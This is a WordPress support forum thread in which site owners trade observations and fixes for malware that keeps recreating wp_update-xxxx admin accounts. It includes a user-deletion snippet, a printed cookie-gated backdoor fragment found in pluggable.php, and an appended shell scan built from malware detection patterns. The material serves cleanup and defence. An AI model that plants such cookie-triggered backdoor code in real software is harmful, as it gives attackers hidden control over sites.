• eduardobartelle

    (@eduardobartelle)


    Hi, I have a lot of sites with Wordfence and a user keeps signing in with the name wp_update-xxxxxxx and admin privileges (the x are numbers that vary).

    I have deleted it but it keeps coming back; when I scan with Wordfence it doesn't return anything…


Viewing 15 replies - 31 through 45 (of 50 total)
  • I also had the same problem but the site was brand new, a week old so with everything updated and nice and clean and the main security measures active (hidden login page, non-standard table prefix etc). I don’t understand how they created it.

    I’m not sure if the code below will help. It goes in functions.php.

    Basically the system deletes the account and its content with “wp_update-” when they attempt to log in.
    It also sends you an email when the code runs.

    function delete_specific_users_and_content_and_notify() {
        if (is_admin()) {
            $users = get_users(array('search' => 'wp_update-*'));
            foreach ($users as $user) {
                // Check if the username indeed starts with "wp_update-"
                if (substr($user->user_login, 0, 10) === "wp_update-") {
                    require_once(ABSPATH.'wp-admin/includes/user.php');
                    
                    // Get all posts by the user
                    $user_posts = get_posts(array('author' => $user->ID, 'post_type' => 'any', 'numberposts' => -1));
                    
                    // Delete each post
                    foreach ($user_posts as $user_post) {
                        wp_delete_post($user_post->ID, true); // Set to true to bypass trash
                    }
                    
                    // Finally, delete the user
                    wp_delete_user($user->ID, 1); // Reassign posts to user ID 1 (usually the admin)
                    
                    // Prepare and send the notification email
                    $to = 'your@emailaddress'; // Change this to your email address
                    $subject = '[WEB SECURITY] ' . get_bloginfo('url');
                    $message = 'Site Name: ' . get_bloginfo('name') . "\r\n" .
                               'Site URL: ' . get_bloginfo('url') . "\r\n" .
                               'Deleted Username: ' . $user->user_login;
                    
                    wp_mail($to, $subject, $message);
                }
            }
        }
    }
    add_action('admin_init', 'delete_specific_users_and_content_and_notify');
    • This reply was modified 8 months, 4 weeks ago by webonology.

    Search Google for “wp_update-” (include the double quotes), scroll down and look at all the infected sites.

    I have been attempting to clean up similar infections. What I can tell you is that I have uncovered plenty of invisible files (names starting with a period, like “.hudut76.php”) that contained malware code that Wordfence did not detect in scans. In addition I have seen examples of bad injected code in the WP database, mostly in the wp-options table.

    With much of the code either base64 encoded or ASCII code encoded, it has been almost impossible to know exactly how the admin users are getting injected into the database, but I am pretty sure it happens when a real admin accesses the dashboard or otherwise interacts with the site.

    Having used multiple tools, and monitored the sites for weeks, I have had to resort to a complete scorched earth policy (archive the site, and delete everything). Then rebuild. Unless you have a known clean backup (which I do not, all my backups also are compromised), it is the only way to be sure.

    As an aside, if those admin logins show up, assume that your wp-config.php and your database logins, passwords and keys are no longer secure. Sorry I don’t have better news.

    -pm

    CPRETTY

    (@andrea-capretti)

    Hi everyone, I’m also having the same problem. I started working on a new client’s website and noticed that it is full of files (like lixtndzc.php or 8vx748s.ccss), a lot of wp-updates-XXX administrator accounts and code injected into index.php files in all server folders. I’m trying everything: I have installed both WP Cerber and Sucuri to scan files, and I notice that every 2-3 hours about twenty different IPs try to access different php files, and every day around 2.00am they insert code into the files index.php and wp-config.php, which I clean up every day. I reset the passwords of the FTP accounts and the main cPanel account.
    The problem is that when they insert the code in the index.php file in the public_html folder, the ajax functions of the contact forms are blocked, and therefore every day I have to check and remove that code. The hosting provider washes their hands of it.
    I’m following this post to see if anyone finds a solution, otherwise I’ll try this Imunify360 too.
    Thanks

    mignonnehalpern

    (@mignonnehalpern)

    Hey, I am following this to see if anyone ever found a resolution here. I’ve had the EXACT same issue for some time, and do the same daily thing of cleaning the wp_config.php and the index.php file (and other junk files). Has anyone found out how they are doing this, to be able to stop it? I also see the permissions change as well, all the same stuff, but no idea how they are doing it.

    uhuge

    (@uhuge)

    @mignonnehalpern I suppose their main trick is the cookie trigger for their custom code. Changing database credentials helped surprisingly a lot too.

    I have had this issue on multiple sites for several months now. Have hired professionals and all seems fine, and then after a couple of months they get infected again. Has anyone found the solution to this? Isn’t there a way to stop creating / automatically delete new users with wp_update usernames or users created outside WordPress? Wordfence ought to have such an option but I don’t see it.

    Hi there,

    Same problem on multiple WP sites. No idea how these types of users are created, but I followed another approach with 2 interventions:

    1. Created one simple plugin which blocks every attempt to login from any country other than mine.

    2. Created a trigger on the wp_users table which, in case something with a login name similar to wp_update-xxxx is inserted, does not insert it into the table…

    This is not actually a solution because clearly they have an attack vector which is unknown to us, but until a real solution is found, I stick with my workaround.

    PS. The strange thing is that I also have a WAF reverse proxy with OWASP rules, but they still bypass it!

    Peace!

    • This reply was modified 5 months, 3 weeks ago by albgen.

    7 months and no solution. Other posts with the same issue suggest sending Wordfence stuff but still no reply with a solution or vector. Disappointing.

    Yes, I can’t understand 90% of the solutions suggested. All the solutions require you to be a rocket scientist in coding. WordPress is supposed to simplify your life, not complicate it to this extent. How someone can just get into your server, add users and code to your website, and get away with it scot-free is beyond me. Sounds like a class action suit against WordPress to me.

    THIS IS WHAT WORKED FOR ME –
    ————————————————————————–
    1. I first installed Wordfence plugin on every site and ran it, deleting / repairing files, and wp-update users

    For the next steps 2 to 7, I used https://www.lastpass.com/features/password-generator#generatorTool to generate strong passwords.

    2. I changed my host (HostGator) login password
    3. I changed cPanel password
    4. I changed FTP password
    6. I changed every WordPress site admin password
    7. I changed every WordPress database password

    8. I ran Wordfence again on all the sites.
    ————————————————————————–

    This seems to have worked for me.

    If they have ANY ONE of the above login credentials (host, cPanel, FTP, WordPress or WordPress database), they will be able to gain access to ALL the passwords and hack the website again.

    So you need to change ALL of the above passwords, otherwise the problem will come back in a day or two. I have tried it, and it only worked after I changed all the passwords in quick succession.

    tynology

    (@tynology)

    Adding to this as I just went through it: @neolegen seems to be correct in the fix for this. This specific breach is from outside of the WordPress install, which is why Wordfence does not detect it. It looks to be specifically a script that has database credentials and can keep recreating the user (you’ll probably notice no email associated, which is typically required).

    What I’ve gotten to work is to go through and clean all malicious code (it seems to corrupt common themes in functions.php, footer.php and header.php), delete unused themes, change all admin passwords, change hosting/cPanel passwords, FTP password(s), and most importantly the database password (and update wp-config). Make sure all plugins and the WP install are up to date. If any of the auto-created users come back, repeat the process.

    • This reply was modified 5 months ago by tynology. Reason: no edit, just interested in replies

    Amin Y

    (@oscomsupport)

    My site too got infected.

    Things I noticed:

    1. 3 admin users which I never created, one with wp_update-xxxxxx, others named wpxxxxxxxxx
    2. .index.php has malicious code and many folders have an unwanted index.php created with the same code.
    3. wp-config.php has malicious code at the beginning
    4. most files have this code to include a css file in /[SERVER-PATH]/public_html/wp-includes/blocks/comments-title/.[XXXXX.css] containing php code.
    5. some new files created with encrypted/unreadable code, named style.php, profile.php, themes.php etc…
    6. Some files and folders with randomly generated names are created with encrypted code,
    7. wp-includes/pluggable.php has code like this at the end, not sure if this is from that malware or some other plugin.

    if (isset($_COOKIE["_JdXGxQ1hFqMjLZVi9BgfcH6PU84YmezEw7ka5yO02TpNlvtb3usWCAnr"]))
    {
    $lines = get_option( 'wpsdt4_license_key' );
    if (!empty($lines))
    {
    $lines = @file_get_contents("6cd7c012");
    }
    echo $lines;
    exit();
    }

    How I tried to fix it…

    Mostly I used some text patterns to search for files using the “strlocator” plugin, to remove these files and code on the server. Deleted admin users, changed FTP pass, DB pass, WP admin pass, unwanted plugins.

    Amin Y

    (@oscomsupport)

    8. Also it’s writing the admin username and password to a text file in the root; the code that writes it is injected in wp-includes/pluggable.php.
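    An added example, not from the thread or from Wordfence: a portable shell scan that reports the file-level artefacts the posts above describe (the hidden .php dotfiles -pm found, the PHP hidden in a .css under wp-includes/blocks/comments-title, the cookie-gated code in pluggable.php, eval/base64 in the daily-rewritten index.php and wp-config.php, stray profile.php/themes.php/style.php outside wp-admin, and a credential text file in the root). The patterns are heuristics assumed from the thread, so every hit needs a manual look, and the hypothetical path passed as the argument is the site's public_html.

```shell
#!/bin/sh
# Constructed example for this thread: report-only scan of a WordPress
# document root for the artefacts reported in the posts above. Nothing
# here is deleted; compare hits against a fresh WordPress download.

tag() { sed "s|^|$1: |"; }

wp_ioc_scan() {
    root=${1%/}
    # Heuristic: a literal $_COOKIE key of 40+ characters. Core reads cookies
    # through constants such as AUTH_COOKIE, not long literal strings.
    cookie_re='\$_COOKIE\[.[A-Za-z0-9_]{40,}'

    # 1. Hidden PHP files such as ".hudut76.php" anywhere in the tree
    find "$root" -type f -name '.*.php' | tag hidden-php
    # 2. Stylesheet-named files (.css / .ccss) that carry a PHP open tag
    find "$root" -type f \( -name '*.css' -o -name '*.ccss' \) \
        -exec grep -lE '<\?php' {} + | tag php-in-css
    # 3. Cookie-gated code in any PHP file (pluggable.php in the thread)
    find "$root" -type f -name '*.php' \
        -exec grep -lE "$cookie_re" {} + | tag cookie-gate
    # 4. Obfuscation in the entry points the thread says are rewritten daily
    find "$root" -type f \( -name index.php -o -name wp-config.php \) \
        -exec grep -lE 'base64_decode\(|eval\(' {} + | tag injected-entrypoint
    # 5. Admin-screen file names outside wp-admin, where WordPress never puts them
    find "$root" -type f \( -name style.php -o -name profile.php -o -name themes.php \) \
        ! -path "$root/wp-admin/*" | tag stray-admin-file
    # 6. Text files in the root (credential drop from post 8); license.txt is stock
    for f in "$root"/*.txt; do
        [ -e "$f" ] || continue
        case ${f##*/} in license.txt) ;; *) printf '%s\n' "$f" | tag root-txt ;; esac
    done
}

# Usage: sh wp_ioc_scan.sh /home/user/public_html   (hypothetical path)
if [ -n "${1:-}" ]; then
    wp_ioc_scan "$1"
fi
```

    Run it again after the password rotation the other posts describe; a hit reappearing in a previously clean tree is the signal that the attacker still has a way in outside WordPress.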
